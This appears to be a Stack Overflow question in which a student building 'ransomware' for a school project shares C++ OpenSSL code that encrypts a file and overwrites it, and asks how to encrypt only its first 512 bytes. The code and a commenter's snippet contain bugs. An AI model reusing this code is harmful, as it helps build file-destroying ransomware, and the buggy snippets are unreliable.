# Only encrypt first 512 bytes of a file

Tags: c++, file, encryption, binaryfiles, binary-data

For a school project, I have to make a Ransomware. For bigger file my teacher told me to only encrypt first bytes so, I would like to only encrypt the first 512 bytes of a file if it's size is greater than 5 MB.
I currently use the [EVP Encryption](https://wiki.openssl.org/index.php/EVP_Symmetric_Encryption_and_Decryption) to encrypt a file and I check the size of the file in the encryption function.

I can encrypt an entire file but how to encrypt the first 512 bytes of a file then concatenate it with the remnant data (the unencrypted part) ?

Here is my code :

```
void Ransomware::aes_encrypt(const byte key[KEY_SIZE], const byte iv[BLOCK_SIZE], string path)
{ 
string ctext, ptext, endByte;

EVP_CIPHER_CTX_free_ptr ctx(EVP_CIPHER_CTX_new(), ::EVP_CIPHER_CTX_free);
int rc = EVP_EncryptInit_ex(ctx.get(), EVP_aes_256_cbc(), NULL, key, iv);
if (rc != 1)
    throw std::runtime_error("EVP_EncryptInit_ex failed");

ptext = readfileContents(path);
size_t stext = ptext.size();
// if the file size is greater than 5 MO
if (stext >= 5000)
{
  stext = 512;
  // Truncate the file to get the remnant unencrypted data
  string endByte = ptext.substr(513, ptext.size());
}
    
// Recovered text expands upto BLOCK_SIZE
ctext.resize(stext + BLOCK_SIZE);
int out_len1 = (int)ctext.size();

rc = EVP_EncryptUpdate(ctx.get(), (byte*)&ctext[0], &out_len1, (const byte*)&ptext[0], 
(int)stext);
if (rc != 1)
    throw std::runtime_error("EVP_EncryptUpdate failed");

int out_len2 = (int)ctext.size() - out_len1;
rc = EVP_EncryptFinal_ex(ctx.get(), (byte*)&ctext[0] + out_len1, &out_len2);
if (rc != 1)
    throw std::runtime_error("EVP_EncryptFinal_ex failed");

// Set cipher text size now that we know it
ctext.resize(out_len1 + out_len2);
if (endByte.length() != 0)
{
    ctext.resize(ctext.size() + endByte.size());
    // Concatenate the 512 encrypted bytes with the remnant unencrypted part
    ctext = ctext + endByte;
}
writeEncryptedData(path, ctext);
}
```

ReadContentData as binary function :

```
string Ransomware::readfileContents(const string& filePath)
{
   fstream file;
   file.open(filePath, fstream::in | ios::binary);
   string contents((istreambuf_iterator<char>(file)), (istreambuf_iterator<char>()));
   file.close();
   return contents;
}
```

WriteEncryptedData function :

```
void Ransomware::writeEncryptedData(const string& filePath, const string& alteredContents)
{
   fstream file;
   // Ouverture du fichier et écriture des données chiffrées
   file.open(filePath, fstream::out | fstream::trunc | ios::binary);
   file << alteredContents;
   file.close();
}
```

When I run the program for a file greater than 5 MO, the output file size is only 528 bytes. It seem that only the encrypted part is written. I don't know how to read the next bytes of file to the end after 512 bytes.

Comment: As your open flags for your output stream are, `fstream::out | fstream::trunc | ios::binary`, maybe it would be advantageous to better understand what those options do (if anything)?

Comment: @WhozCraig yes, I think thoose flag are good. I want to erase the file'content in binary and put the new data (new data = 512 encrypted bytes + The remnant bytes)

Comment: @Sad1que Why do you want to erase the files content, your problem description sounds like you want to overwrite only the first 512 bytes.

Comment: @gerum yes I can also do that. But currently I check the file size in the encryption function and I found it easier to take all the file content, get the first 512 bytes encrypt it, concatenate with the unencrypted data and rewrite to the file. But if you have the solution to edit the first 512 bytes, and replace them at the good order, I'm open

Comment: @Sad1que To read only part of the file use 
file.open(filePath, fstream::in | ios::binary);
std::string contents(512);
file.read(s.data(),s.size());
and then removing fstream::trunc should keep the rest of the file unchanged.